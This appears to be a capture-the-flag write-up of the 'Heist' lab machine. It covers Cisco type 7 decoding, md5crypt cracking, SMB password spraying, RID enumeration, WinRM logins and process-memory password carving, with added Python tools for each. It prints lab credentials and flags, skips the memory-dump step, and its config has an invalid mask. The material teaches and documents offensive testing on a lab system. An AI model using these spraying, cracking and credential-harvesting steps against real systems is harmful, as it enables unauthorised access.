Heist introduced a few concepts I had not seen before on HTB while keeping the difficulty easy. I start by finding a Cisco configuration on the website that contains usernames and password hashes. After recovering the passwords, I find one that gives RPC access, which I use to enumerate more usernames. One of those usernames combined with one of the original passwords gives a WinRM session on Heist. From there I notice Firefox is running and dump its process memory to find the password for the original website, which is also the box's Administrator password.
Information Gathering#
└─# nmap -sV 10.129.96.157
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 03:13 EST
Nmap scan report for 10.129.96.157
Host is up (0.39s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.35 seconds
Ports 80 and 445 are open (plus 135/RPC), so start with 80.
The page is a login form. Weak passwords got nowhere, but there is a "login as guest" option.
Password Cracking#
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
This is a Cisco IOS configuration file. Two lines define local accounts:
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
These are "type 7" passwords. Despite the `service password-encryption` line, type 7 is reversible obfuscation (a fixed XOR key), not a hash, so the plaintext can be recovered directly. The remaining credential,
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
is the enable secret, a "type 5" salted MD5 hash (md5crypt), which cannot be reversed and has to be cracked.
CMD5 could not handle these, so I searched for Cisco-specific password tools and found an online decoder:
https://www.ifm.net.nz/cookbooks/passwordcracker.html
It gives rout3r the password $uperP@ssword and admin the password Q4)sJu\Y8qz*A3?d.
That leaves the enable secret still uncracked.
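As an added example (not from the original writeup, and not the ifm.net.nz tool's code), here is the type 7 reversal done locally in Python, together with a small parser that pulls both the `password 7` users and the `enable secret 5` hash out of a config. The XOR key is Cisco's fixed, long-published one; the sample config is assembled from the credential-bearing lines shown above.

```python
import re

# Cisco's fixed Type 7 key. It has been public for decades, which is why
# "service password-encryption" only protects against shoulder-surfing.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

# Lines of interest in an IOS config. 'privilege N' is optional on username lines.
USER_T7 = re.compile(r"^username\s+(\S+)(?:\s+privilege\s+\d+)?\s+password\s+7\s+([0-9A-Fa-f]+)\s*$")
ENABLE_T5 = re.compile(r"^enable\s+secret\s+5\s+(\$1\$\S+)\s*$")


def type7_decode(enc: str) -> str:
    """Reverse a 'password 7' value: two decimal digits of key offset, then hex bytes,
    each XORed with the key byte at (offset + position) mod len(key)."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError(f"not a type 7 string: {enc!r}")
    offset = int(enc[:2])
    body = bytes.fromhex(enc[2:])  # raises ValueError on non-hex input
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)] for i, b in enumerate(body))
    return plain.decode("ascii")


def type7_encode(plain: str, offset: int = 2) -> str:
    """Inverse of type7_decode. Anyone can mint these, so they carry no integrity either."""
    if not 0 <= offset <= 15:
        raise ValueError("IOS uses key offsets 0..15")
    body = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                 for i, b in enumerate(plain.encode("ascii")))
    return f"{offset:02d}{body.hex().upper()}"


def triage_config(config: str) -> dict:
    """Collect recoverable credentials from a config dump.
    Type 7 values are decoded on the spot; the type 5 (md5crypt) enable secret is
    returned as-is because it can only be cracked, not reversed."""
    found = {"users": {}, "enable_secret": None}
    for raw in config.splitlines():
        line = raw.strip()
        m = USER_T7.match(line)
        if m:
            found["users"][m.group(1)] = type7_decode(m.group(2))
            continue
        m = ENABLE_T5.match(line)
        if m:
            found["enable_secret"] = m.group(1)
    return found


# Constructed sample: the credential-bearing lines from the config above.
SAMPLE_CONFIG = """\
service password-encryption
hostname ios-1
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    creds = triage_config(SAMPLE_CONFIG)
    for user, pw in creds["users"].items():
        print(f"{user}: {pw}")
    print("enable secret (crack offline):", creds["enable_secret"])
```

The practical takeaway: any config containing `password 7` strings should be treated as plaintext credentials on disk, and `enable secret` is the only one of the three that actually needs a wordlist.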
Use john to auto-detect the hash type and crack it:
└─# john 2.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 2.09% (ETA: 03:44:05) 0g/s 29115p/s 29115c/s 29115C/s jose1980..jornel
stealth1agent (?)
1g 0:00:01:25 DONE (2022-12-07 03:35) 0.01171g/s 41059p/s 41059c/s 41059C/s stealth323..stealth1967
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
That gives the third password, stealth1agent.
So now I have two usernames and three passwords:
Users
rout3r
admin
Passwords
$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent
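To make concrete what john is doing with the `$1$` hash, here is an added example (not from the writeup, and not john's code): a pure-Python md5crypt, which is the scheme behind Cisco type 5 / `$1$` hashes, plus a small wordlist loop. The "wordlist" is constructed from the candidate words visible in john's status lines above and stands in for rockyou.txt.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5crypt(password: str, salt: str) -> str:
    """FreeBSD/Cisco md5crypt: salted MD5 with 1000 stretching rounds and a custom
    base64 with byte reordering. Output format is '$1$<salt>$<22 chars>'."""
    pw = password.encode()
    sl = salt.encode()[:8]  # at most 8 salt characters are used
    ctx = hashlib.md5(pw + b"$1$" + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    remaining = len(pw)
    while remaining > 0:  # mix in len(pw) bytes of the alternate digest
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:  # one byte per bit of the length: NUL for 1-bits, pw[0] for 0-bits
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):  # the stretching loop is what makes brute force slow
        rnd = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            rnd.update(sl)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    out = []
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return "$1$" + sl.decode() + "$" + "".join(out)


def parse_md5crypt(h: str) -> tuple:
    """Split '$1$salt$hash' into (salt, hash), rejecting anything else."""
    parts = h.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] != "1" or len(parts[3]) != 22:
        raise ValueError(f"not an md5crypt hash: {h!r}")
    return parts[2], parts[3]


def crack_md5crypt(target: str, wordlist):
    """Recompute the hash for each candidate with the target's salt; return the first match
    or None. This is exactly why the salt has to travel with the hash."""
    salt, _ = parse_md5crypt(target)
    for word in wordlist:
        if hmac.compare_digest(md5crypt(word, salt), target):
            return word
    return None


ENABLE_SECRET = "$1$pdQG$o8nrSzsGXeaduXrjlvKc91"
# Constructed stand-in for rockyou.txt: candidates seen in john's status lines above.
SAMPLE_WORDLIST = ["jose1980", "jornel", "stealth323", "stealth1agent", "stealth1967"]

if __name__ == "__main__":
    print(crack_md5crypt(ENABLE_SECRET, SAMPLE_WORDLIST))
```

At roughly 1000 MD5 calls per guess this is orders of magnitude slower than the type 7 reversal, but still far too fast for a 13-character dictionary word to survive; john reported about 41k candidates per second on one core.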
Lateral Movement over Port 445#
With these passwords in hand and 445 open, try them directly with crackmapexec.
Awkwardly, none of the accounts worked (rout3r and admin are router accounts, not necessarily Windows ones). Going back to the website, I added the guest-visible account Hazard from the issues page to the user list.
Run it again:
└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
That gives one valid SMB login: Hazard.
From experience, WinRM is often the way in on these boxes, so check port 5985 too.
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 04:00 EST
Nmap scan report for 10.129.96.157
Host is up (0.41s latency).
PORT STATE SERVICE
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds
Trying Hazard's password over WinRM fails (the account is not allowed to use remote management).
Look at the SMB shares instead:
└─# smbmap -H 10.129.96.157 -u hazard -p stealth1agent
[+] IP: 10.129.96.157:445 Name: 10.129.96.157
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Only IPC$ is accessible, and read-only, which is still enough for RPC-based enumeration over the named pipes.
Enumerating Users over SMB#
https://www.freebuf.com/sectool/175208.html
https://www.heikeblog.com/archives/661.html (this article explains several impacket tools in detail)
lookupsid.py brute-forces RIDs through the LSARPC pipe and resolves each SID, which works with any account that can open IPC$:
└─# python3 lookupsid.py hazard:stealth1agent@10.129.96.157
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
With these new names, extend the original user list and spray again:
└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt --continue-on-success
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
--continue-on-success makes crackmapexec keep going instead of stopping at the first valid login.
It turns up another valid pair: SupportDesk\Chase:Q4)sJu\Y8qz*A3?d, the router's admin password reused for a Windows user.
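An added example (not part of the writeup, and not impacket or crackmapexec code) that glues the two steps above together: it pulls the user accounts out of lookupsid's output, drops built-in accounts that are disabled by default, sizes the spray against an assumed lockout threshold before anything is sent, and then picks the valid logins out of crackmapexec's output so a hit buried in a long listing is not missed. The sample outputs are constructed from the lines shown above; the threshold of 5 and the `(Pwn3d!)` marker handling are assumptions about the environment and tool version.

```python
import re
from itertools import product

# lookupsid.py result lines: "<rid>: DOMAIN\name (SidTypeUser|SidTypeGroup|SidTypeAlias)"
SID_LINE = re.compile(r"^\s*(\d+):\s+(?P<dom>[^\\\s]+)\\(?P<name>\S+)\s+\(Sid(?P<kind>\w+)\)")
# crackmapexec SMB result lines: "[+]" is a valid login, "[-]" a failure with an NT status.
CME_LINE = re.compile(
    r"^\s*SMB\s+\S+\s+\d+\s+\S+\s+\[(?P<mark>[+-])\]\s+"
    r"(?P<dom>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<pw>.*?)"
    r"(?:\s+(?P<status>STATUS_\w+))?(?:\s+(?P<pwned>\(Pwn3d!\)))?\s*$"
)

# Local accounts present on every modern Windows host and disabled by default; spraying
# them only burns attempts. Guest is disabled by default too, but the spray above kept it.
SKIP_BY_DEFAULT = frozenset({"DefaultAccount", "WDAGUtilityAccount"})


def users_from_lookupsid(text: str, skip=SKIP_BY_DEFAULT) -> list:
    """Return SidTypeUser names in RID order, ignoring groups/aliases and skipped accounts."""
    users = []
    for line in text.splitlines():
        m = SID_LINE.match(line)
        if m and m.group("kind") == "TypeUser" and m.group("name") not in skip:
            users.append(m.group("name"))
    return users


def spray_plan(users, passwords, lockout_threshold=5) -> list:
    """All (user, password) pairs, refusing to exceed the assumed per-account lockout
    threshold. 5 is an assumption; read the real policy with 'net accounts' once inside."""
    if len(passwords) >= lockout_threshold:
        raise ValueError(
            f"{len(passwords)} passwords per user would risk lockout (threshold {lockout_threshold})"
        )
    return list(product(users, passwords))


def valid_logins(cme_output: str) -> list:
    """Pick (user, password, is_local_admin) out of crackmapexec output.
    is_local_admin comes from the '(Pwn3d!)' suffix crackmapexec appends for admin logins."""
    hits = []
    for line in cme_output.splitlines():
        m = CME_LINE.match(line)
        if m and m.group("mark") == "+":
            hits.append((m.group("user"), m.group("pw"), m.group("pwned") is not None))
    return hits


# Constructed samples taken from the two outputs above.
SAMPLE_LOOKUPSID = r"""
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
"""

SAMPLE_CME = r"""
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
"""

if __name__ == "__main__":
    users = users_from_lookupsid(SAMPLE_LOOKUPSID)
    pairs = spray_plan(users, ["$uperP@ssword", "Q4)sJu\\Y8qz*A3?d", "stealth1agent"])
    print(f"{len(pairs)} attempts across {len(users)} users")
    for user, pw, admin in valid_logins(SAMPLE_CME):
        print(f"valid: {user}:{pw}{' (local admin)' if admin else ''}")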
WinRM Connection#
┌──(root㉿kali)-[~/Desktop]
└─# evil-winrm -i 10.129.96.157 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents>
The new user Chase can connect.
Getting the user flag#
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> dir
Directory: C:\Users\Chase\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 12/9/2022 7:41 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Chase\desktop> type user.txt
d4a33ebeff5334ec5c96993941af64d8
*Evil-WinRM* PS C:\Users\Chase\desktop>
Getting the root flag#
There are many users on this machine, but I cannot read their desktops; Chase's privileges are low.
Look at the todo.txt from earlier:
*Evil-WinRM* PS C:\Users\Chase\desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
Three items: keep checking the issues list, fix the router config (which is how the credentials leaked), and guest access has already been restricted.
Check the running processes:
*Evil-WinRM* PS C:\Users\Chase\desktop> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
468 18 1980 5272 368 0 csrss
290 13 2224 5104 472 1 csrss
357 15 3448 14572 2156 1 ctfmon
251 14 3920 13316 3916 0 dllhost
166 9 1880 9716 0.03 6616 1 dllhost
614 32 29164 57988 960 1 dwm
1498 58 23896 78852 5304 1 explorer
1090 68 128468 205616 5.72 6264 1 firefox
347 19 10144 38584 0.11 6444 1 firefox
355 25 16396 38876 0.06 6716 1 firefox
401 34 34604 92436 0.70 6840 1 firefox
378 28 22020 58668 0.70 7020 1 firefox
49 6 1792 4584 768 1 fontdrvhost
49 6 1492 3808 776 0 fontdrvhost
0 0 56 8 0 0 Idle
976 22 5800 14792 624 0 lsass
223 13 3072 10308 3220 0 msdtc
0 12 400 15056 88 0 Registry
275 14 3096 15000 5448 1 RuntimeBroker
145 9 1716 7524 5732 1 RuntimeBroker
303 16 5636 17024 5804 1 RuntimeBroker
663 32 19716 61648 5668 1 SearchUI
550 11 5192 9632 608 0 services
672 28 14788 51860 5576 1 ShellExperienceHost
440 17 4792 23976 5032 1 sihost
53 3 528 1100 268 0 smss
471 22 5812 16264 2460 0 spoolsv
201 12 1980 9592 332 0 svchost
150 9 1812 11648 700 0 svchost
85 5 928 3716 724 0 svchost
860 20 6944 22496 744 0 svchost
378 13 10684 14832 852 0 svchost
868 16 5288 11672 856 0 svchost
257 10 2016 7648 908 0 svchost
286 13 4148 11276 1020 0 svchost
140 7 1364 5620 1068 0 svchost
126 16 4016 7832 1188 0 svchost
184 9 1796 7440 1200 0 svchost
229 12 2628 11208 1216 0 svchost
430 9 2808 8828 1236 0 svchost
154 7 1256 5540 1264 0 svchost
231 9 2168 7512 1304 0 svchost
367 17 4904 13864 1380 0 svchost
172 10 1792 8012 1392 0 svchost
353 14 4380 11480 1440 0 svchost
163 9 3084 7628 1452 0 svchost
255 15 3520 8512 1484 0 svchost
305 11 1976 8740 1492 0 svchost
191 12 2144 11888 1624 0 svchost
320 10 2552 8328 1640 0 svchost
163 11 2868 7356 1716 0 svchost
161 8 1896 7052 1772 0 svchost
129 7 1564 6216 1784 0 svchost
409 32 8448 17000 1820 0 svchost
196 11 1976 8040 1880 0 svchost
239 11 2516 9604 1888 0 svchost
171 9 1532 7176 2120 0 svchost
332 18 14656 31224 2124 0 svchost
167 12 4032 10820 2504 0 svchost
181 22 2488 9796 2512 0 svchost
462 20 12112 26688 2524 0 svchost
261 13 2668 7892 2540 0 svchost
376 15 9708 19304 2564 0 svchost
133 9 1672 6484 2604 0 svchost
136 8 1560 6096 2632 0 svchost
126 7 1224 5264 2656 0 svchost
205 11 2288 8296 2676 0 svchost
233 14 4604 11740 2752 0 svchost
169 10 2204 13200 2816 0 svchost
209 12 1852 7416 2824 0 svchost
265 19 3208 12000 2864 0 svchost
464 17 3448 11820 3076 0 svchost
193 15 6076 10004 3144 0 svchost
382 23 3340 12184 3248 0 svchost
423 48 13668 22296 3256 0 svchost
211 11 2780 11836 4432 0 svchost
145 8 1680 7432 4640 0 svchost
187 12 2636 13236 4696 0 svchost
169 9 4792 12192 4868 0 svchost
300 15 12772 14740 4928 0 svchost
251 14 3188 13740 4940 0 svchost
228 12 3100 13560 5048 1 svchost
365 18 5720 27008 5080 1 svchost
122 7 1288 5520 6208 0 svchost
115 7 1328 5192 6404 0 svchost
264 14 3632 12648 6488 0 svchost
225 12 3624 10940 6572 0 svchost
321 20 10184 14620 6756 0 svchost
1891 0 192 136 4 0 System
211 20 3976 12372 2036 1 taskhostw
167 11 2788 10760 2720 0 VGAuthService
142 8 1696 6844 2692 0 vm3dservice
136 9 1820 7352 3056 1 vm3dservice
384 22 9616 22104 2708 0 vmtoolsd
236 18 5096 15288 5712 1 vmtoolsd
171 11 1500 6860 492 0 wininit
280 13 2816 12936 528 1 winlogon
344 16 8920 18660 3196 0 WmiPrvSE
812 27 52104 70388 1.78 4316 0 wsmprovhost
Everything looks normal except the firefox processes, which stand out on a support desk box with no interactive user logged in from my side. Following the pentester's instinct (and the plan from the summary: dump the Firefox process memory and search it for the password typed into the website), the recovered password turns out to also be the local Administrator's, and it works over WinRM:
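The writeup does not show the dump-and-search step itself, so as an added example (not the author's commands) here is the search half in Python: it carves printable ASCII and UTF-16LE strings out of a process dump the way `strings` and `strings -el` would, and looks for password-style form parameters in both, URL-decoding what it finds. Windows processes keep a lot of text as UTF-16LE, so an ASCII-only grep for the literal password can miss it, and a browser may hold the form body percent-encoded. The dump bytes and the form field name (`login_password`) are constructed for the example; the password value is the Administrator one used below.

```python
import re
from urllib.parse import unquote

# Printable runs, like `strings` (ASCII) and `strings -el` (UTF-16LE); 8 chars minimum.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")
# Form/query parameters whose name suggests a secret. The value runs to the next '&',
# whitespace or quote; '%' is allowed so percent-encoded values are captured whole.
SECRET_PARAM = re.compile(r"(?:pass(?:word|wd)?|pwd|secret)=([^&\s\"']{1,128})", re.IGNORECASE)


def carve_strings(dump: bytes):
    """Yield (encoding, byte_offset, text) for every printable run in the dump."""
    for m in ASCII_RUN.finditer(dump):
        yield "ascii", m.start(), m.group().decode("ascii")
    for m in UTF16_RUN.finditer(dump):
        yield "utf-16le", m.start(), m.group().decode("utf-16le")


def find_secret_params(dump: bytes) -> list:
    """Return (encoding, byte_offset, decoded_value) for each secret-looking parameter."""
    hits = []
    for enc, off, text in carve_strings(dump):
        for m in SECRET_PARAM.finditer(text):
            hits.append((enc, off, unquote(m.group(1))))
    return hits


def unique_values(dump: bytes) -> list:
    """The de-duplicated secrets, which is what you actually go and try next."""
    return sorted({v for _, _, v in find_secret_params(dump)})


# Constructed dump: an ASCII request fragment, binary noise, then the same form body as a
# browser might keep it, UTF-16LE and percent-encoded. Field names are assumed, not real.
SAMPLE_DUMP = (
    b"\x00\x10\xff\x7f" * 4
    + b"username=admin&login_password=4dD!5}x/re8]FBuZ&submit=Login"
    + b"\x00" * 7 + b"\x89PNG\r\n\x1a\n" + b"\x00" * 3
    + "login_password=4dD%215%7Dx%2Fre8%5DFBuZ&submit=Login".encode("utf-16le")
    + b"\x00\x00"
)

if __name__ == "__main__":
    for enc, off, val in find_secret_params(SAMPLE_DUMP):
        print(f"{enc:9} @0x{off:06x}: {val}")
```

Run it against a real dump by replacing SAMPLE_DUMP with the file contents; on a multi-hundred-megabyte Firefox dump the two regex passes are still fast, and the offsets let you go back with a hex viewer to see what surrounded the hit.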
└─# evil-winrm -i 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/9/2022 7:41 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
22479c36a38a8b34331942f57b066490
*Evil-WinRM* PS C:\Users\Administrator\Desktop>